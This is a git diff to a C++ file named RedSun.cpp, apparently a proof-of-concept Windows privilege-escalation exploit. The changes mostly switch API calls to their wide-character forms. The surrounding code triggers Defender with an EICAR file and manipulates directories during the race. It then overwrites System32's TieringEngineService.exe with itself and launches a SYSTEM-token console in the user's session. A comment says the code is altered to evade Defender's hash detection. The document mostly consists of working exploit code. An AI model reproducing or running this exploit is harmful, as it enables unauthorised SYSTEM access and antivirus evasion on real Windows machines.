diff --git a/RedSun.cpp b/RedSun.cpp index e44207d..ffed46e 100644 --- a/RedSun.cpp +++ b/RedSun.cpp @@ -5,13 +5,15 @@ // Windows Defender from picking up on it just because of its // hash. -#define _CRT_SECURE_NO_WARNINGS -#include -#include -#include -#include -#include -#include +#define _CRT_SECURE_NO_WARNINGS +#define WIN32_NO_STATUS +#include +#include +#undef WIN32_NO_STATUS +#include +#include +#include +#include #pragma comment(lib,"synchronization.lib") #pragma comment(lib,"sas.lib") @@ -73,8 +75,8 @@ typedef struct _REPARSE_DATA_BUFFER { -HMODULE h = LoadLibrary(L"ntdll.dll"); -HMODULE hm = GetModuleHandle(L"ntdll.dll"); +HMODULE h = LoadLibraryW(L"ntdll.dll"); +HMODULE hm = GetModuleHandleW(L"ntdll.dll"); NTSTATUS(WINAPI* _NtOpenDirectoryObject)( PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, @@ -518,7 +520,7 @@ void DoCloudStuff(wchar_t* syncroot, wchar_t* filename, DWORD filesz = 0x1000) void LaunchConsoleInSessionId() { - HANDLE hpipe = CreateFile(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + HANDLE hpipe = CreateFileW(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hpipe == INVALID_HANDLE_VALUE) return; DWORD sessionid = 0; @@ -541,9 +543,9 @@ void LaunchConsoleInSessionId() return; } - STARTUPINFO si = { 0 }; + STARTUPINFOW si = { 0 }; PROCESS_INFORMATION pi = { 0 }; - CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi); + CreateProcessAsUserW(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi); CloseHandle(hnewtoken); @@ -591,12 +593,12 @@ void LaunchTierManagementEng() int main() { - HANDLE hpipe = CreateNamedPipe(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL); + HANDLE hpipe = CreateNamedPipeW(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL); if (hpipe == INVALID_HANDLE_VALUE) return 1; wchar_t workdir[MAX_PATH] = { 0 }; - ExpandEnvironmentStrings(L"%TEMP%\\RS-", workdir, MAX_PATH); + ExpandEnvironmentStringsW(L"%TEMP%\\RS-", workdir, MAX_PATH); GUID uid = { 0 }; wchar_t wuid[100] = { 0 }; @@ -605,17 +607,17 @@ int main() wcscat(workdir, wuid); wchar_t filename[] = L"TieringEngineService.exe"; wchar_t foo[MAX_PATH]; - wsprintf(foo, L"%ws\\%ws", workdir, filename); + wsprintfW(foo, L"%ws\\%ws", workdir, filename); DWORD tid = 0; HANDLE hthread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)ShadowCopyFinderThread, foo, NULL, &tid); - if (!CreateDirectory(workdir, NULL)) + if (!CreateDirectoryW(workdir, NULL)) { printf("Failed to create workdir"); return 1; } - HANDLE hfile = CreateFile(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + HANDLE hfile = CreateFileW(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hfile == INVALID_HANDLE_VALUE) { printf("Failed create spoof work file.\n"); @@ -627,7 +629,7 @@ int main() WriteFile(hfile, eicar, sizeof(eicar) - 1, &nwf, NULL); // trigger AV response - CreateFile(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + CreateFileW(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (WaitForSingleObject(gevent, 120000) != WAIT_OBJECT_0) { printf("PoC timed out, is real time protection enabled ?"); @@ -656,9 +658,9 @@ int main() InitializeObjectAttributes(&_objattr, &_foo, OBJ_CASE_INSENSITIVE, NULL, NULL); wchar_t _tmp[MAX_PATH] = { 0 }; - wsprintf(_tmp, L"\\??\\%s.TMP", workdir); - MoveFileEx(workdir,_tmp,MOVEFILE_REPLACE_EXISTING); - if (!CreateDirectory(workdir, NULL)) + wsprintfW(_tmp, L"\\??\\%s.TMP", workdir); + MoveFileExW(workdir, _tmp, MOVEFILE_REPLACE_EXISTING); + if (!CreateDirectoryW(workdir, NULL)) { printf("Failed to re-create directory.\n"); return 1; @@ -689,7 +691,7 @@ int main() { wchar_t _tmp[MAX_PATH] = { 0 }; - wsprintf(_tmp, L"\\??\\%s.TEMP2", workdir); + wsprintfW(_tmp, L"\\??\\%s.TEMP2", workdir); PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp))); ZeroMemory(pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp))); @@ -768,10 +770,10 @@ int main() wchar_t mx[MAX_PATH] = { 0 }; - GetModuleFileName(GetModuleHandle(NULL), mx, MAX_PATH); + GetModuleFileNameW(GetModuleHandleW(NULL), mx, MAX_PATH); wchar_t mx2[MAX_PATH] = { 0 }; - ExpandEnvironmentStrings(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH); - CopyFile(mx, mx2, FALSE); + ExpandEnvironmentStringsW(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH); + CopyFileW(mx, mx2, FALSE); LaunchTierManagementEng(); Sleep(2000); CloseHandle(hpipe);